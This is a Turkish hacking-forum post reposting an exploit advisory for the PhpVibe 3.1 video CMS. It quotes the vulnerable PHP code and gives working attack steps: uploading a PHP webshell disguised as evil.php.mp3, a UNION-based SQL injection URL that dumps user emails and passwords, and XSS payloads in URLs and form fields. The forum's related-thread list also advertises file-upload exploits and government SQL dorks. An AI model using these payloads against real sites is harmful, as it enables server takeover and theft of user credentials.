Konuyu Oyla:
  • Derecelendirme: 5/5 - 1 oy
  • 1
  • 2
  • 3
  • 4
  • 5
PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları
#1
Kod:
###########################################################################################
#Exploit Title: PhpVibe 3.1 - Multiple Vulnerabilites
#Product: PhpVibe
#Official site: http://phprevolution.com/
#Risk Level: High
#Exploit Author: Esac
#Last Checked: 23/08/2013
###########################################################################################


+----------+
| OVERVIEW |
+----------+

PhpVibe is a Premium video sharing cms with or without upload. Supports all main video sharing websites like Youtube, Vimeo, Dailymotion, Metacafe… and flv, mp4, mp3 uploads. No ffmpeg required. Upload option can be turned off.

+-----------------------------------------------------------------------------------+


+-------------------------------------+
| Remote Arbitrary File Upload Vuln   |
+-------------------------------------+


Affected file : upload.php


...............................................


    if ($_FILES['file']['name']!='') {
    $fileName= $_FILES['file']['name'];
    $fileSize = $_FILES['file']['size'];
    $ext = substr($fileName, strrpos($fileName, '.') + 1);
    if (in_array($ext,$allowedExts) or empty($allowedExts)) {
        if ($fileSize<$maxFileSize or empty($maxFileSize)) {
    $target_path = $target_path . basename( $_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $target_path)) {
        echo '{"success":true, "file": "'.$target_path.'"}';
            vinsert(basename( $_FILES['file']['name']),basename( $_FILES['file']['name']));
    } else{
        echo '{"success":false, "details": "move_uploaded_file failed"}';
    }
} else { echo('{"success":false, "details": "Maximum file size: '.ByteSize($maxFileSize).'."}'); };
} else echo('{"success":false, "details": "File type '.$ext.' not allowed."}');
} else echo '{"success":false, "details": "No file received."}';


real exploitation :

to exploit this vuln , u must be a registred user and go to upload video area

http://server/upload

upload ur evil file as evil.php.mp3 or file.php.mp4 or file.php.flv

Shell access :

http://host/media/flv/month-date-year-time-minute-pm/am-file.php.mp3

Demo :

server/media/flv/august-23-13-5-10-pm-evil.php.flv


+-----------------------------------------------------------------------------------+


+---------------+
| SQL Injection |
+---------------+
  
PhpVibe is possibly vulnerable to SQL Injection attacks , affected file : rss.php , param : cat

affected code :

//rss.php , line 24

function clean_feed($input)
{
    $original = array("<", ">", "&", '"', "'", "<br/>", "<br>");
    $replaced = array("<", ">", "&", ""","'", "", "");
    $newinput = str_replace($original, $replaced, $input);
    
    return $newinput;
}


echo'<?xml version="1.0" encoding="utf-8"?>
<rss version="2.0">
<channel>
';
echo '
<title>'.$seo_title.'</title>
<description>'.$seo_desc.'</description>
<link>'.$site_url.'</link>
';
if($cat = MK_Request::getQuery('cat')) {
$vbox_result = dbquery("select * from videos WHERE category ='".$cat."' > 0 ORDER BY id DESC limit 0, 30");
} else {
$vbox_result = dbquery("select * from videos WHERE views > 0 ORDER BY id DESC limit 0, 30");
}
while($videosData = mysql_fetch_array($vbox_result))
{
    $url = $site_url.'video/'.$videosData["id"].'/'.seo_clean_url($videosData['title']) .'/';
    $rss_datetime = $videosData["date"];
echo '
     <item>
<title>'.strip_tags($videosData['title']).'</title>
<link><![CDATA['.$url.']]></link>
<guid><![CDATA['.$url.']]></guid>
<pubDate>'.$rss_datetime.'</pubDate>
<description>[CDATA['.clean_feed($videosData["description"]).' ]]</description>
</item>
      
     ';

}

echo'</channel>



Poc :

http://server/rss.php?cat=-1+union+select+concat_ws(id,email,password),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16+from+users--


+--------------------------------------------------------------------------------------+

+-----------+
|XSS Attack |
+-----------+

Multiple XSS vulnerabilities have been detected in phpVibe 3.1

1) Input appended via the URL to show/ is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.

exemple :
http://server/show/'">><marquee><h1>XSS</h1></marquee>



2) Input passed to the "email" parameter in forgot-pass.php, login.php, and register.php is not properly sanitised before being returned to the user. This can be exploited to execute arbitrary HTML and script code in a user's browser session in context of an affected site.
The vulnerabilities are reported in version 3.1. Other versions may also be affected.


exemple :

http://server/forgot-pass.php   => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/login.php         => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>
http://server/register.php      => POST (multipart) input email was set to '">><marquee><h1>XSS</h1></marquee>

+--------------------------------------------------------------------------------------+

Knowledge is not an object , it's a flaw :)
Greetz : White Tarbouch TEAM - Cobra
www.Iss4m.ma
./Issam IEBOUBEN Aka Esac

Kaynak =>
Kod:
http://www.exploit-db.com/exploits/27872/
www.deccal.org


Beğenenler:

Konu ile Alakalı Benzer Konular
Konular Yazar Yorumlar Okunma Son Yorum
  WordPress TheAgency Teması Dosya Yükleme Açığı KingSkrupellos 11 195 05-12-2016, Saat: 18:42
Son Yorum: the_zizil
  UpL Image Board_2 Content Dosya Yükleme Açığı KingSkrupellos 5 111 04-12-2016, Saat: 12:21
Son Yorum: antisecureman
  Website by Raw Marketing Editor Asset Dosya Yükleme Açığı KingSkrupellos 7 125 30-11-2016, Saat: 08:48
Son Yorum: the_zizil
  WP Premium Gallery Manager Plugin Dosya Yükleme Açığı KingSkrupellos 7 112 27-11-2016, Saat: 15:07
Son Yorum: Efetimi
  Gov SQL Dorks Devlet Açıkları KingSkrupellos 247 11,970 24-11-2016, Saat: 13:02
Son Yorum: Trajedi
Anahtar Kelimeler

PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları indir, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Videosu, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Online izle, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Bedava indir, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Yükle, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Hakkında, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Nedir, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Free indir, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Oyunu, PhpVibe 3.1 Video Yükleme - SQL - XSS Açıkları Download


1 Ziyaretçi